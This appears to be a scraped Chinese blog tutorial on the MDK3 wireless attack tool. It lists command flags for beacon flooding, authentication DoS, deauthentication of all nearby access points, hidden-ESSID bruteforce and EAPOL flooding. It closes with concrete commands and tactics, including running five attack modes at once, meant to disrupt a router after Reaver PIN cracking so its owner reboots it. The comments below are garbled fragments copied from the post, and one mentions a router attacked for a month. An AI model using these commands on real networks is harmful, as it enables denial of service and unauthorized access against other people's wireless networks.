作者:hacker发布时间:2022-07-17分类:破解邮箱浏览:78评论:4
经过长期使用发现其实mdk3对部分路由有用,有部分路由是防dos攻击的,完全起不
MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。
——虽然这几句话被转了N遍,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:
首先激活无线网卡至监听模式,然后输入mdk3 --fullhelp查看详细帮助内容
beacon flood mode:
这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
详细命令如下:
mdk3 mon0 b
-n ssid #自定义ESSID
-f filename #读取ESSID列表文件
-v filename #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a #WPA AES encryption
-m #读取数据库的mac地址
-c chan #自定义信道
-s pps #发包速率
mdk3 --help b #查看详细内容
Authentication DoS:
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!
mdk3 mon0 a
-a ap_mac #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i ap_mac #对指定BSSID进行智能攻击
-s pps #速率,默认50
Deauthentication/Disassociation Amok:
这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
mdk3 mon0 d
-w filename #白名单mac地址列表文件
-b filename #黑名单mac地址列表文件
-s pps #速率,这个模式下默认无限制
-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1
Basic probing and ESSID Bruteforce mode:
基本探测AP信息和ESSID猜解模式
mdk3 mon0 p
-e ssid #待检测的ssid
-f filename #检测AP设置为隐藏的ssid列表文件
-t bssid #用bssid检测AP的信息
-s pps #速率,默认300
-b character set #设置字符集
802.1X tests:
802.1X 协议下的攻击测试
mdk3 mon0 x
0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击
-n ssid
-t bssid #目标客户端的mac地址
-w WPA type
Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
-u unicast cipher
Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-m multicast cipher
Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-s pps #速率,默认400
1 - EAPOL Logoff test #注销认证攻击
-t bssid #目标客户端的mac地址
-c bssid #目标ap的合法客户端mac
-s pps #速率,默认400
以下几种攻击模式,可以一个个试,看那个模式有用:mdk3 mon0 a -p 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -d 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -f 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -g 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
要彻底弄死AP恐怕是很难的,不过楼主可以试试在有客户端连接此AP时,用-a -d -p -f -g这五种同时攻击(可以用一张网卡使用五次airmon-ng start wlan0虚拟出来同时攻击),那AP就算不死也会被严重干扰,无线连接无法正常连接。在这种情况下如果客户端是主人家那么就会重启路由了,不会等到AP没有无线信号时去重启路由了!
标签:mdk3ap攻击软件
已有4位网友发表了看法:
访客 评论于 2022-07-17 19:50:13 回复
用发现其实mdk3对部分路由有用,有部分路由是防dos攻击的,完全起不在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??MDK3 是一款无线DO
访客 评论于 2022-07-18 04:23:10 回复
注意空格和大小写)mdk3 mon0 a -g 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)请教:mdk3会彻底让路由器挂了吗?我攻击的一个快一个月没出现了。要彻底弄死AP恐怕是很难的,不过楼主可以试
访客 评论于 2022-07-17 22:59:01 回复
filename #读取ESSID列表文件 -v filename #自定义ESSID和BSSID对应列表文件 -d #自定义为Ad-H
访客 评论于 2022-07-17 19:06:25 回复
flood mode: 这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep